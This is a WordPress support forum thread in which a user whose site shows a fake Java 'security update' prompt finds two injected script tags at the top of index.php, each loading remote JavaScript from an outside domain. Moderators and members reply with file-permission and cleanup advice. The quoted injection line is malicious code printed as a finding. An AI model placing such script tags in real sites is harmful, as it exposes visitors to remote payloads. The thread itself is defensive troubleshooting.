WordPress.org

Ready to get started?Download WordPress

Forums

A java plugin needs permission to run on your site (9 posts)

  1. GretarMagg
    Member
    Posted 2 years ago #

    I think this is quite suspicious, the name of this plugin is *Atencao* Atualisacao de Seguranca Clique em Executar (or something like that). The site suddenly appears on the left side of the window in IE9 but is still centered in Chrome and Firefox.

    I deactivated all the plugins the site is using but that did not change anything. Has my website been hacked or what ?

  2. esmi
    Forum Moderator
    Posted 2 years ago #

    Where did you download this plugin from? Have you tried resetting the plugins folder by FTP or PhpMyAdmin. Sometimes, an apparently inactive plugin can still cause problems.

  3. GretarMagg
    Member
    Posted 2 years ago #

    Thats the thing, I didn´t download this plugin at all (not that I know of anyway) and now that the website is left aligned in IE I´m afraid it has been hacked somehow or something is just not right... I deleted all inactive plugins but that didn´t change anything.

  4. GretarMagg
    Member
    Posted 2 years ago #

    My index.php file was probably hacked. These two lines were at the top <script type="text/javascript" src="http://anisioteixeira.com.br/red.php"></script>
    <script type="text/javascript" src="http://anisioteixeira.com.br/red.php"></script>

    Is there any way to know how this was done ? My theme had CHMOD 777 on all files but now I changed them to 755.

  5. kmessinger
    Volunteer Moderator
    Posted 2 years ago #

    Directories should be 755, files should be 644.

  6. Floridian12
    Member
    Posted 2 years ago #

    kmessinger is right. The way your permissions are set, your blog is wide open to the world. CHMOD all your folders (directories) to 755 and all the directory contents to 644. Make sure your .htaccess file doesn't have any new code in it. CHMOD the .htaccess file to 644 also (the world should have zero access to read, write, or execute that file). Then run a virus scan on your server (or ask your host to do it) to find the shell that the hacker is using. You can reinstall wordpress, but if the shell is hidden in one of your other directories you will be reinfected. After the scan results come back clean, change all passwords, reinstall the latest version of wordpress.

  7. kmessinger
    Volunteer Moderator
    Posted 2 years ago #

  8. Floridian12
    Member
    Posted 2 years ago #

    @ kmessinger or 440.

  9. GretarMagg
    Member
    Posted 2 years ago #

    Thank you very much guys, I will harden my WordPress installation on the server.

Topic Closed

This topic has been closed to new replies.

About this Topic

Tags

No tags yet.